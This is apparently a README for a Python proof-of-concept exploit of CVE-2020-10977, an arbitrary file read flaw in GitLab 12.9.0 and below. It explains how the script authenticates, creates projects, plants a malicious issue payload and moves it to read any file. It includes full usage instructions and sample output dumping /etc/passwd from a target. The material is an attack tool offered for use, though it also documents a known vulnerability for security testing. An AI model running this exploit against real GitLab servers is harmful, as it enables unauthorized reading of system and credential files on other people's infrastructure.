Awesome

CVE-2020-10977

GitLab 12.9.0 Arbitrary File Read

Target : 12.9.0 and below

Tested : GitLab 12.8.1

In a recent engagement I found a GitLab instance on the target, I found a PoC on Exploit-DB but it uses LDAP for authentication and it was disabled in this case, so I created this python script which can authenticate using web GUI, like the original PoC it will create two projects, an issue in one of the projects with the malicious payload and it will move this issue from one project to another and will automatically read the file contents.

I have added few things such as the script will ask for an absolute path you wish to read, after printing its contents it will ask for another path and cleanup on exit, both projects will be automatically deleted when you exit the script using CTRL+C

$ python3 cve_2020_10977.py http://localhost twh p4ssw0rd
----------------------------------
--- CVE-2020-10977 ---------------
--- GitLab Arbitrary File Read ---
--- 12.9.0 & Below ---------------
----------------------------------

[>] Found By : vakzz       [ https://hackerone.com/reports/827052 ]
[>] PoC By   : thewhiteh4t [ https://twitter.com/thewhiteh4t      ]

[+] Target        : http://localhost
[+] Username      : twh
[+] Password      : p4ssw0rd
[+] Project Names : ProjectOne, ProjectTwo

[!] Trying to Login...
[+] Login Successful!
[!] Creating ProjectOne...
[+] ProjectOne Created Successfully!
[!] Creating ProjectTwo...
[+] ProjectTwo Created Successfully!
[>] Absolute Path to File : /etc/passwd
[!] Creating an Issue...
[+] Issue Created Successfully!
[!] Moving Issue...
[+] Issue Moved Successfully!
[+] File URL : http://localhost/twh/ProjectTwo/uploads/5f74b01d2b58e4a57ca55e1ac8778650/passwd

> /etc/passwd
----------------------------------------

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
.
.
.
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
.
.
.
git:x:998:998::/var/opt/gitlab:/bin/sh
gitlab-www:x:999:999::/var/opt/gitlab/nginx:/bin/false
gitlab-redis:x:997:997::/var/opt/gitlab/redis:/bin/false
gitlab-psql:x:996:996::/var/opt/gitlab/postgresql:/bin/sh
mattermost:x:994:994::/var/opt/gitlab/mattermost:/bin/sh
registry:x:993:993::/var/opt/gitlab/registry:/bin/sh
gitlab-prometheus:x:992:992::/var/opt/gitlab/prometheus:/bin/sh
gitlab-consul:x:991:991::/var/opt/gitlab/consul:/bin/sh

----------------------------------------

[>] Absolute Path to File : ^C
[-] Keyboard Interrupt
[!] Deleting ProjectOne...
[+] ProjectOne Successfully Deleted!
[!] Deleting ProjectTwo...
[+] ProjectTwo Successfully Deleted!

Dependencies

pip3 install requests bs4

Usage

Register an account on target GitLab and use the same credentials with the script

$ python3 cve_2020_10977.py -h
usage: cve_2020_10977.py [-h] url username password

positional arguments:
  url         Target URL with http(s)://
  username    GitLab Username
  password    GitLab Password

optional arguments:
  -h, --help  show this help message and exit

Credits

• Thank you vakzz for finding this bug in GitLab
  • HackerOne Report : https://hackerone.com/reports/827052
• Thank you KouroshRZ for creating a PoC for this exploit
  • Exploit-DB : https://www.exploit-db.com/exploits/48431